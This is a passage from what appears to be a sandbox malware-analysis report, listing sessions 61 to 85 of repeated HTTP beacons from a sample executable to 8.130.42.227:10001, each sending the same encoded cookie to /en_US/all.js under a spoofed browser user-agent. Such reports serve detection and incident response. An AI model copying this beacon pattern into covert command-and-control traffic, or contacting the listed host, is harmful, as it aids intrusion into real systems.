                                                                Oct 1, 2024 09:18:09.433604956 CEST | 404 | OUT | GET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:18:10.406157970 CEST | 114 | IN | HTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:18:10 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                61 | 192.168.2.4 | 49798 | 8.130.42.227 | 10001 | 6992 | C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Oct 1, 2024 09:18:10.529619932 CEST | 404 | OUT | GET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:18:11.475215912 CEST | 114 | IN | HTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:18:11 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                62 | 192.168.2.4 | 49799 | 8.130.42.227 | 10001 | 6992 | C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Oct 1, 2024 09:18:11.589905977 CEST | 404 | OUT | GET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:18:12.557328939 CEST | 114 | IN | HTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:18:12 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                63 | 192.168.2.4 | 49800 | 8.130.42.227 | 10001 | 6992 | C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Oct 1, 2024 09:18:12.669694901 CEST | 404 | OUT | GET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:18:13.613919020 CEST | 114 | IN | HTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:18:13 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                64 | 192.168.2.4 | 49801 | 8.130.42.227 | 10001 | 6992 | C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Oct 1, 2024 09:18:13.730804920 CEST | 404 | OUT | GET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:18:14.684660912 CEST | 114 | IN | HTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:18:14 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                65 | 192.168.2.4 | 49802 | 8.130.42.227 | 10001 | 6992 | C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Oct 1, 2024 09:18:14.808661938 CEST | 404 | OUT | GET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:18:15.751969099 CEST | 114 | IN | HTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:18:15 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                66 | 192.168.2.4 | 49803 | 8.130.42.227 | 10001 | 6992 | C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Oct 1, 2024 09:18:15.885741949 CEST | 404 | OUT | GET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:18:16.838865995 CEST | 114 | IN | HTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:18:16 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                67 | 192.168.2.4 | 49804 | 8.130.42.227 | 10001 | 6992 | C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Oct 1, 2024 09:18:16.949246883 CEST | 404 | OUT | GET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:18:17.902736902 CEST | 114 | IN | HTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:18:17 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                68 | 192.168.2.4 | 49805 | 8.130.42.227 | 10001 | 6992 | C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Oct 1, 2024 09:18:18.070692062 CEST | 404 | OUT | GET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:18:19.022764921 CEST | 114 | IN | HTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:18:18 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                69 | 192.168.2.4 | 49806 | 8.130.42.227 | 10001 | 6992 | C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Oct 1, 2024 09:18:19.154947042 CEST | 404 | OUT | GET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:18:20.290249109 CEST | 114 | IN | HTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:18:19 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                70 | 192.168.2.4 | 49807 | 8.130.42.227 | 10001 | 6992 | C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Oct 1, 2024 09:18:20.406044960 CEST | 404 | OUT | GET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:18:21.351322889 CEST | 114 | IN | HTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:18:21 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                71 | 192.168.2.4 | 49808 | 8.130.42.227 | 10001 | 6992 | C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Oct 1, 2024 09:18:21.466885090 CEST | 404 | OUT | GET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:18:22.404139042 CEST | 114 | IN | HTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:18:22 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                72 | 192.168.2.4 | 49809 | 8.130.42.227 | 10001 | 6992 | C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Oct 1, 2024 09:18:22.516719103 CEST | 404 | OUT | GET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:18:23.470350027 CEST | 114 | IN | HTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:18:23 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                73 | 192.168.2.4 | 49810 | 8.130.42.227 | 10001 | 6992 | C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Oct 1, 2024 09:18:23.596708059 CEST | 404 | OUT | GET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:18:24.563240051 CEST | 114 | IN | HTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:18:24 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                74 | 192.168.2.4 | 49811 | 8.130.42.227 | 10001 | 6992 | C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Oct 1, 2024 09:18:24.687603951 CEST | 404 | OUT | GET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:18:25.623217106 CEST | 114 | IN | HTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:18:25 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                75 | 192.168.2.4 | 49812 | 8.130.42.227 | 10001 | 6992 | C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Oct 1, 2024 09:18:25.752697945 CEST | 404 | OUT | GET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:18:26.699789047 CEST | 114 | IN | HTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:18:26 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                76 | 192.168.2.4 | 49813 | 8.130.42.227 | 10001 | 6992 | C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Oct 1, 2024 09:18:26.817373991 CEST | 404 | OUT | GET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:18:27.765852928 CEST | 114 | IN | HTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:18:27 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                77 | 192.168.2.4 | 49814 | 8.130.42.227 | 10001 | 6992 | C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Oct 1, 2024 09:18:27.892714977 CEST | 404 | OUT | GET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:18:28.877537966 CEST | 114 | IN | HTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:18:28 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                78 | 192.168.2.4 | 49815 | 8.130.42.227 | 10001 | 6992 | C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Oct 1, 2024 09:18:28.998631954 CEST | 404 | OUT | GET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:18:29.989542961 CEST | 114 | IN | HTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:18:29 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                79 | 192.168.2.4 | 49816 | 8.130.42.227 | 10001 | 6992 | C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Oct 1, 2024 09:18:30.111059904 CEST | 404 | OUT | GET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:18:31.053788900 CEST | 114 | IN | HTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:18:30 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                80 | 192.168.2.4 | 49817 | 8.130.42.227 | 10001 | 6992 | C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Oct 1, 2024 09:18:31.172106981 CEST | 404 | OUT | GET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:18:32.116039991 CEST | 114 | IN | HTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:18:31 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                81 | 192.168.2.4 | 49818 | 8.130.42.227 | 10001 | 6992 | C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Oct 1, 2024 09:18:32.264465094 CEST | 404 | OUT | GET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:18:33.219223976 CEST | 114 | IN | HTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:18:33 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                82 | 192.168.2.4 | 49819 | 8.130.42.227 | 10001 | 6992 | C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Oct 1, 2024 09:18:33.342219114 CEST | 404 | OUT | GET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:18:34.334094048 CEST | 114 | IN | HTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:18:34 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                83 | 192.168.2.4 | 49820 | 8.130.42.227 | 10001 | 6992 | C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Oct 1, 2024 09:18:34.450947046 CEST | 404 | OUT | GET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:18:35.513272047 CEST | 114 | IN | HTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:18:35 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                84 | 192.168.2.4 | 49821 | 8.130.42.227 | 10001 | 6992 | C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Oct 1, 2024 09:18:35.624229908 CEST | 404 | OUT | GET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:18:39.577821016 CEST | 114 | IN | HTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:18:39 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                85 | 192.168.2.4 | 49822 | 8.130.42.227 | 10001 | 6992 | C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Oct 1, 2024 09:18:39.706851006 CEST | 404 | OUT | GET /en_US/all.js HTTP/1.1
                                                                Accept: */*
